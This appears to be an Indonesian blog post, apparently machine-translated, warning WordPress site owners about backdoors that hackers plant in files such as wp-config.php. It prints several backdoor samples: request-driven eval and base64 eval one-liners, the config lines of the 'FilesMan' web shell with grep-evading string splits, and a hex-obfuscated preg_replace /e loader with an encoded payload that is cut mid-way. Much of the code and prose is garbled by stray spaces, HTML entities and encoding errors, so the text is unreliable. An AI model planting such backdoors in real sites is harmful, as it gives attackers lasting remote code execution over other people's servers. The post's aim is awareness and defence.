Bahayanya Backdoor Di Situs WordPress.

Ya mungkin bagi para "Peretas" atau yang disebut "Hacker" sudah tidak asing lagi dengan nama "Backdoor". Backdoor atau "Pintu Belakang", dalam hal ini sangat umum bagi hacker untuk menempatkan "backdoor" di situs mereka telah diretas. Sebuah backdoor dapat memberikan hacker terus akses ke situs bahkan jika perubahan pemilik situs password account. Script Backdoor akan bervariasi dari 100-baris kode untuk 1 atau 2 baris kode.

Ini adalah backdoors yang sering kami lihat di situs  WordPress, biasanya dalam file wp-config.php

if (isset ($ _REQUEST ['FILE'])) {$ _ FILE = $ _ REQUEST ['12722f6d103997f30e9765d0153305'] ('$ _', $ _ REQUEST ['FILE'] '($ _);'.); $ _file (Stripslashes ($ _REQUEST ['HOST']));}atauif (isset ($ _REQUEST ['ch']) & amp; & amp; (md5 ($ _REQUEST ['ch']) == & nbsp; '970a023a0983e5b4c9a2d3dd6adbd0b8') & amp; & amp; isset ($ _REQUEST ['php_code'])) {eval ($ _REQUEST ['php_code']); exit (); }

Backdoor sederhana ini sulit untuk menemukan saat terselip 100s baris kode php!

$ _REQUEST [E]? eval (base64_decode ($ _REQUEST [e])): exit;

Ini baris kode yang ditemukan dalam file ditambahkan ke situs oleh hacker, sering menyamar sebagai bagian dari sebuah plugin atau tema. Ketika hacker meminta file mereka dapat mengeksekusi kode php yang terkandung dalam e variabel di situs.

Daftar di bawah ini untuk script backdoor yang sangat umum yang disebut "FilesMan". Biasanya script backdoor yang ditulis dalam bentuk php.

<? php$ auth_pass = "";$ color = "# df5";$ default_action = "FilesMan";$ default_charset = "Windows-1251";** Atau entri seperti ini **$ auth_pass = "47a85". "6c68". 'e623468d84123?. "e87881d1e3 ?;$ color = â € œ # df5 ?;$ default_action = "File" 'SMA' 'n'..;$ default_use_ajax = true;. $ default_charset = 'Jendela -' '1251';

** Berpisah "File". 'SMA'. 'N' membuat lebih sulit untuk menemukan menggunakan alat bantu seperti Grep **
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9PD4yO7yuxmbZMqjU08SucezfplwQmPhvNpH4lgn06PoS+8WeQ70diFHiGW4ECPQjeeh1PmRV3OKDLxOWccQD8r2ykMNnYcB2uxPNRA3iNo9kel7vvj0zNgwgwJlIBwAKYIXUTB22DkTcuctoHnlq3tPjCIG3a2gfUmbOLG42DQBr6KO++dKFoE4aDFtr3pbB6z+HbmtmfiK5s6E/7W0ZOjeQ8an107
[Saya telah memotong beberapa ribu karakter dari tengah]
/2TbqT1h5uBDDyWQ2JxjxOVqKVYmsou2jN48pODXaOq3k71VGkMgAj0qBKIe23mhtlgqRPaiumPc1VyGEjNRmxfpq19yXeyRoyW1QL21EU9mG71ZbeZbVX1tkTGUgznaovNwCBb2LktysLQKgjU6GwP3egN5izU7PzTYD5Z57mAKbIg9ibZgzSLmzG/Yv9kodGeME0UyOcps1tbyevXz6tUX9TIksvuq1s+tmmVc/PdX17VfUNdvEk9P9rRr6ndyon2WHOMK8UfWnGz5cas6G8+69FauVHkafhE3/koI8apAgCADBEYuBo4QqRhLkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx54qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");
?>

Kode ini adalah backdoor digunakan dengan banyak hacks spam. Backdoor menulis / menulis ulang file htaccess dan file php yang berisi kondisi - adalah agen pengguna "bot"? Jika Ya menambahkan konten spam. Para hacker akan menyembunyikan file dengan nama yang tidak berbahaya, mengatakan .users.php dan tetap dalam folder sedikit digunakan atau setidaknya sedikit diperiksa pada situs.